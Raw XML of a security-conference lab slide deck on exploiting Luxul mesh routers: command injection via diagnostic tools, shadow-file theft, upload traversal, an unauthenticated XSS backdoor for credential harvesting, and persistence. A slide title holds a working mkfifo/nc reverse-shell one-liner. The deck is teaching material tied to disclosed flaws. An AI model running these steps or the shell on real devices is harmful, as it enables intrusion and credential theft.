      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2916218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3103-C2AD-58C8-84E4-B551FC24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Modify the request to write the backdoor to /WWW or LUCI2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6E4FC7-A425-E318-835B-73C8F96BD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26" y="1489965"/>
            <a:ext cx="10515600" cy="432106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BA8382-5974-AB7B-138E-87CEF2C49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966" y="1611705"/>
            <a:ext cx="2740838" cy="36345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575816-8E20-F1DF-4513-FA6BDAB612F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5432079" y="5246295"/>
            <a:ext cx="65856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Directory Listings are typically seen as lower severity.. Until they’re not! This device allows unauthenticated access / directory listings. Think of how you can leverage this later. How do I know if my backdoor has persisted? How can I use this to maintain access?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425595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3D75-C569-7D9F-7098-EA014C93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14289"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will need to alter the permissions on the file.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Extra Mile : Make the page accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>without using a shell /reverse shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>only diagnostic tools / web requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>*.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" i="1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C837303-A40E-14FB-A4F1-E9B5A08A0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20" y="2227863"/>
            <a:ext cx="10515600" cy="395112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46EEA5-AAE7-E48E-EF10-CA646ABA6875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153909" y="4078587"/>
            <a:ext cx="45267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*Hint: WE ARE ROOT AND HAVE COMMAND INJECTION!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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C1FD2C1-CB8D-26E0-0863-3B02B697C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49" y="4657718"/>
            <a:ext cx="3982251" cy="183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89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A164B5-BD2B-B7AE-1D9B-900A0EB41E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Exploit + Simple Exploit + Lateral Thinking = Powerful Attacks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3B883D8-3BF7-379F-B6D0-677329122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have the tools to perform very powerful attacks and compromise the entire mesh network!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How?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29082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5A2BB-8685-A54E-9C44-693434933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 Mile Challenges: Enumeration, Exploit, LotL, PIVOT!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not make permanent changes to the devices.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48B4D-0687-FC32-74FF-2288FB6E3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Exploitation : Use TRACERT to  accomplish command injection and find upstream networks without spawning a reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Exploitation : Are there any services you can *turn on* to obtain persistent access? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Tool Abuse : What DNS tools / techniques could help you User space exfiltrate data? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Exploitation / Hybrid Attacks – Is there anything interesting in log files that can be abused or repurposed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Enumeration &amp; Scaling : Find the SSL certs / keys – Where is there a potential problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Enumeration &amp; Code Review : Find the AES implementation – Why does it matter and is there an additional potential issue?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003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B494-A4D6-BB55-DA59-88E477F4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94ACB-6C70-D218-16FD-D11BE864C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Wireless infrastructure is a unique blended threat and a relatively unmonitored space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Living off the land” is mastering the fundamentals and working with what the defense gives you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromising Layer 2/3 devices at the center of integration is “easy mode” hacking. YOU OWN THE NETWORK… CAPTURE TRAFFIC!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lower severity issues are fantastic for supplementing post-exploitation, establishing persistence, enhancing attacks.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7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6E49-7AED-94B4-0155-D87CF1D6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you going to exploit?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>NO CVES YET. We attempted to responsibly disclose to the manufacturer (LUXUL) and registered for CVEs with MITRE.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B87BD-EC32-AF93-544B-A553F1A8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CVE-2024-???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2024-???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2024-???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flaws and others can be used to leverage powerful attacks simply and with minimal tools.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LIVE OFF THE LAND*!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*Great, “elite tier” hacking is not performing simple attacks through complex methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s performing complex attacks through simple methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - KP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346070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B34B-797D-4F08-1585-81E58303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/ Apps / What you may want to have for the lab…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65ACC-3896-E399-5074-F098A5338A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*can* use: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BURP / Intercepting Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacking Tools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C7F4F2-D4CE-A2C9-E9B8-6817F414EC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*should use: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 Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your Keyboard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4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050A-1781-511C-38EC-7A5DB1B2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SSID &amp;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B8D47-0B84-1982-4AEF-E77516576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43669" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireless is available. (DC-#)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password: defconrules!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also plug an ethernet cable directly in!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8" descr="Luxul MN-10 Epic Mesh MU-MIMO Wireless Network System | AV Australia Online">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41125A7E-F354-96F6-305F-62291A1A5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692" y="959621"/>
            <a:ext cx="425767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66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B065-F4FD-8802-BCEA-A3CE75AFC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plug it in and login to the device!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F516E-BC07-1651-9BA9-B09A7CE29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u="sng" dirty="0"/>
              <a:t>APs deployed and prepped are preconfigured.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DO NOT MODIFY THE DEFAULT SETTINGS OR CONFIGURATION.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DO NOT BREAK / BRICK THE DEVICES – This is a lab environment.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NEED TO RESET YOUR DEVICE, COME FIND ONE OF US!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7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6050-BEFD-8935-E1E2-94DC3E53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Ahead: Examining the Login / Future Requests*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0716-5364-7065-C603-B12FEC87D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60541" cy="4602335"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The device has a lack of security / HTTP headers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most requests are not obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strip most values / tokens from requests – NOT REQUIRED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can use these for all kinds of implantation, exploitation, exfiltration, and more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THERE ARE NO HTTP SECURITY HEADERS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>*Thinking Ahead: How could this be useful for an attacker for pivoting / further exploitation?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A2015-881E-1BBB-8405-A269E579C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9" y="1057297"/>
            <a:ext cx="6552531" cy="3435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094087-7504-F2E8-89B8-B4DC08FF7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024" y="3945702"/>
            <a:ext cx="3856776" cy="264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08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7D38-1C55-9A34-5539-D4E4FB89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 – Wait?!?!?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0E5E3-41D6-8E52-BAC2-DE800CC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6184" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login: Admin / lowercase of password printed on bottom. (IP: 192.168.0.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password: NOT MASKED (lowercase / check bottom of device)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Login &amp; Examine the request / response in Burp Repeater!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A3361-AB9B-653E-3183-192367C02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18" y="505839"/>
            <a:ext cx="4609717" cy="584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5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2380</TotalTime>
  <Words>1960</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>204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Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>LUXUL Wireless Routers: Living off the Land inside your AV System!</vt:lpstr>
      <vt:lpstr>What is the target device?</vt:lpstr>
      <vt:lpstr>What are we doing today?</vt:lpstr>
      <vt:lpstr>What are you going to exploit? NO CVES YET. We attempted to responsibly disclose to the manufacturer (LUXUL) and registered for CVEs with MITRE.</vt:lpstr>
      <vt:lpstr>Tools / Apps / What you may want to have for the lab…</vt:lpstr>
      <vt:lpstr>SSID &amp; Passwords</vt:lpstr>
      <vt:lpstr>Let’s plug it in and login to the device!</vt:lpstr>
      <vt:lpstr>Thinking Ahead: Examining the Login / Future Requests*</vt:lpstr>
      <vt:lpstr>Login Screen – Wait?!?!?</vt:lpstr>
      <vt:lpstr>LET’S GET HACKING!</vt:lpstr>
      <vt:lpstr>Lessons in LotL – Useful Linux Commands</vt:lpstr>
      <vt:lpstr>Insecure Diagnostic Tools – LIVING OFF THE LAND</vt:lpstr>
      <vt:lpstr>So.. Where is the problem?</vt:lpstr>
      <vt:lpstr>Why does this work and why is it so easy?</vt:lpstr>
      <vt:lpstr>LotL Attacks!  ICMP FLOODING – Large ICMP requests = Network Congestion</vt:lpstr>
      <vt:lpstr>Enumerate, Enumerate, Enumerate!</vt:lpstr>
      <vt:lpstr>Explore! There are many reverse shell options.</vt:lpstr>
      <vt:lpstr>Reverse shell? Try /USR/BIN – MKFIFO and NC! </vt:lpstr>
      <vt:lpstr>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.0.156 9999 &gt;/tmp/f</vt:lpstr>
      <vt:lpstr>RCE is awesome.. But loud and it may get patched.</vt:lpstr>
      <vt:lpstr>Lessons in LotL – Useful Linux Commands </vt:lpstr>
      <vt:lpstr>Have you tried just grabbing the SHADOW file?</vt:lpstr>
      <vt:lpstr>Rewind back a bit…</vt:lpstr>
      <vt:lpstr>Let’s get a little more advanced and weaponize!</vt:lpstr>
      <vt:lpstr>How and *why* did we do this? </vt:lpstr>
      <vt:lpstr>Directory Listings Enabled – Make the most of enumeration!</vt:lpstr>
      <vt:lpstr>We are running as root and we are in /</vt:lpstr>
      <vt:lpstr>Let’s upload an unauthenticated backdoor!</vt:lpstr>
      <vt:lpstr>Create a simple XSS backdoor: Unauthenticated Persistence and Pivoting into User space / Phishing / Credential Harvesting</vt:lpstr>
      <vt:lpstr>CVE-2024- Upload Traversal and Arbitrary File Writing</vt:lpstr>
      <vt:lpstr>CVE-2024- Upload Traversal and Arbitrary File Writing</vt:lpstr>
      <vt:lpstr>The daemon is running as root and the web application poorly sanitizes the file name.</vt:lpstr>
      <vt:lpstr>Error Message? Ignore it!</vt:lpstr>
      <vt:lpstr>Modify the request to write the backdoor to /WWW or LUCI2</vt:lpstr>
      <vt:lpstr>We will need to alter the permissions on the file. Extra Mile : Make the page accessible without using a shell /reverse shell &amp; only diagnostic tools / web requests*.  </vt:lpstr>
      <vt:lpstr>Simple Exploit + Simple Exploit + Lateral Thinking = Powerful Attacks</vt:lpstr>
      <vt:lpstr>Extra Mile Challenges: Enumeration, Exploit, LotL, PIVOT! Do not make permanent changes to the devices.</vt:lpstr>
      <vt:lpstr>What did we learn today?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Pyle, Kenneth W</dc:creator>
  <cp:lastModifiedBy>Pyle, Kenneth W</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-02T01:50:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-10T15:14:48Z</dcterms:modified>
</cp:coreProperties>
</file>